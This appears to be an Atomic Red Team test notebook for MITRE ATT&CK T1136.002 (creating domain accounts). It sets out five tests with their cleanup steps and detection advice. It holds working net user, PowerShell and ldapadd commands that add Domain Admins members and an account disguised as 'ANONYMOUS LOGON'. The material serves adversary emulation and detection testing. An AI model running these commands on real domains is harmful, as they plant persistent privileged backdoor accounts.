# T1136.002 - Domain Account
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

## Atomic Tests

### Atomic Test #1 - Create a new Windows domain admin userCreates a new domain admin user in a command prompt.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net user "T1136.002_Admin" "T1136_pass123!" /add /domain
net group "Domain Admins" "T1136.002_Admin" /add /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 1

#### Cleanup: 
```cmd
net user "T1136.002_Admin" >nul 2>&1 /del /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Create a new account similar to ANONYMOUS LOGONCreate a new account similar to ANONYMOUS LOGON in a command prompt.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net user "ANONYMOUS  LOGON" "T1136_pass123!" /add /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 2

#### Cleanup: 
```cmd
net user "ANONYMOUS  LOGON" >nul 2>&1 /del /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Create a new Domain Account using PowerShellCreates a new Domain User using the credentials of the Current User
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$SamAccountName = 'T1136.002_Admin'
$AccountPassword = ConvertTo-SecureString 'T1136_pass123!' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 3

#### Cleanup: 
```powershell
cmd /c "net user T1136.002_Admin /del >nul 2>&1"
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Active Directory Create Admin Account
Use Admin Credentials to Create A Domain Admin Account

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available

##### Check Prereq Commands:
```sh
which ldapadd && which ldapmodify

```
##### Get Prereq Commands:
```sh
echo ldapadd or ldapmodify not found; exit 1

```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
echo "dn: CN=Admin User,CN=Users,DC=example,DC=test\nchangetype: add\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Admin User\nsn: User\ngivenName: Atomic User\nuserPrincipalName: adminuser@example.test\nsAMAccountName: adminuser\nuserAccountControl: 512\nuserPassword: {CLEARTEXT}s3CureP4ssword123!\nmemberOf: CN=Domain Admins,CN=Users,DC=example,DC=test" > tempadmin.ldif
echo ldapadd -H ldap://example.test:389 -x -D admin@example.test -w s3CurePssw0rD! -f tempadmin.ldif
ldapadd -H ldap://example.test:389 -x -D admin@example.test -w s3CurePssw0rD! -f tempadmin.ldif
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 4

#### Cleanup: 
```sh
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://adVM:389 -x -D admin@example.test -w s3CurePssw0rD! -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Active Directory Create User Account (Non-elevated)
Use Admin Credentials to Create A Normal Account (as means of entry)

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapadd, ldapmodify

##### Check Prereq Commands:
```sh
which ldapadd
which ldapmodify

```
##### Get Prereq Commands:
```sh
echo ldapadd or ldapmodify not found; exit 1

```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
echo "dn: cn=Atomic User, cn=Users,dc=example,dc=test\nobjectClass: person\ncn: Atomic User\nsn: User" > tempadmin.ldif
echo ldapadd -H ldap://example.test:389 -x -D user@example.test -w s3CurePssw0rD! -f tempadmin.ldif
ldapadd -H ldap://example.test:389 -x -D user@example.test -w s3CurePssw0rD! -f tempadmin.ldif
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 5

#### Cleanup: 
```sh
echo removing Atomic User (temporary user)
echo "dn: cn=Atomic User,cn=Users,dc=scwxscratch,dc=dev\nchangetype: delete" > deleteuser.ldif
ldapmodify -H ldap://adVM:389 -x -D user@example.test -w s3CurePssw0rD! -f deleteuser.ldif
rm deleteuser.ldif
rm tempadmin.ldif
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 5 -Cleanup

## Detection
Monitor for processes and command-line parameters associated with domain account creation, such as <code>net user /add /domain</code>. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.